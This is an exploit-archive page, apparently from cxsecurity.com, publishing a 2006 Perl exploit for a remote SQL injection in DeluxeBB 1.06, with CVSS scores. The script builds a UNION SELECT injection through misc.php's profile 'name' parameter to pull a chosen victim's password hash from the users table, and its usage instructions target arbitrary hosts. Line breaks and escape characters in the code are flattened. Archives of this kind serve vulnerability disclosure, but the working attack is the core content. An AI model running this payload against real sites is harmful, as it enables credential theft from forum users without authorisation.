DeluxeBB 1.06 Remote SQL Injection Exploit

2006.05.24
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#!/usr/bin/perl use IO::Socket; print q{ ############################################# # DeluxeBB 1.06 Remote SQL Injection Exploit# # exploit discovered and coded # # by KingOfSka # # http://contropotere.netsons.org # ############################################# }; if (!$ARGV[2]) { print q{ Usage: perl dbbxpl.pl host /directory/ victim_userid perl dbbxpl.pl www.somesite.com /forum/ 1 }; exit(); } $server = $ARGV[0]; $dir = $ARGV[1]; $user = $ARGV[2]; $myuser = $ARGV[3]; $mypass = $ARGV[4]; $myid = $ARGV[5]; print "----------------------------------------------------------------------- -------------------------rn"; print "[>] SERVER: $serverrn"; print "[>] DIR: $dirrn"; print "[>] USERID: $userrn"; print "----------------------------------------------------------------------- -------------------------rnrn"; $server =~ s/(http://)//eg; $path = $dir; $path .= "misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0 ,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%20WHERE%20(uid='".$ user ; print "[~] PREPARE TO CONNECT...rn"; $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED"; print "[+] CONNECTEDrn"; print "[~] SENDING QUERY...rn"; print $socket "GET $path HTTP/1.1rn"; print $socket "Host: $serverrn"; print $socket "Accept: */*rn"; print $socket "Connection: closernrn"; print "[+] DONE!rnrn"; print "--[ REPORT ]----------------------------------------------------------------------- -------------rn"; while ($answer = <$socket>) { if ($answer =~/(w{32})/) { if ($1 ne 0) { print "Password Hash is: ".$1."rn"; print "----------------------------------------------------------------------- ---------------rn"; } exit(); } } print "----------------------------------------------------------------------- -------------------------rn";


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top